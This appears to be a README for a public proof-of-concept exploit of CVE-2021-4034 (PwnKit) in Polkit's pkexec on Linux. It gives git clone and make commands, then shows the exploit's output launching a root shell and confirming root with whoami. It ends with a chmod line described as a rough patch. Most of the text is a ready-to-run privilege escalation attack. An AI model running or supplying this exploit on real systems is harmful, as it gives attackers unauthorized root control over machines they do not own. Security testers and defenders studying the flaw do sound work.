
Exploit for CVE-2021-4034 (PwnKit) in Polkit's pkexec, providing local privilege escalation to root on Linux systems. Includes build instructions and a rough patch.
$ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git
$ cd CVE-2021-4034
$ make
[!] CVE-2021-4034 Exploit By whokilleddb
[!] Initializing Setup
[+] Setup Done :D
[!] Setting Root Privileges
[!] Launching Root Shell
# /bin/whoami
root
# chmod 0755 `which pkexec`
Note: You can configure the options by playing around with include/config.h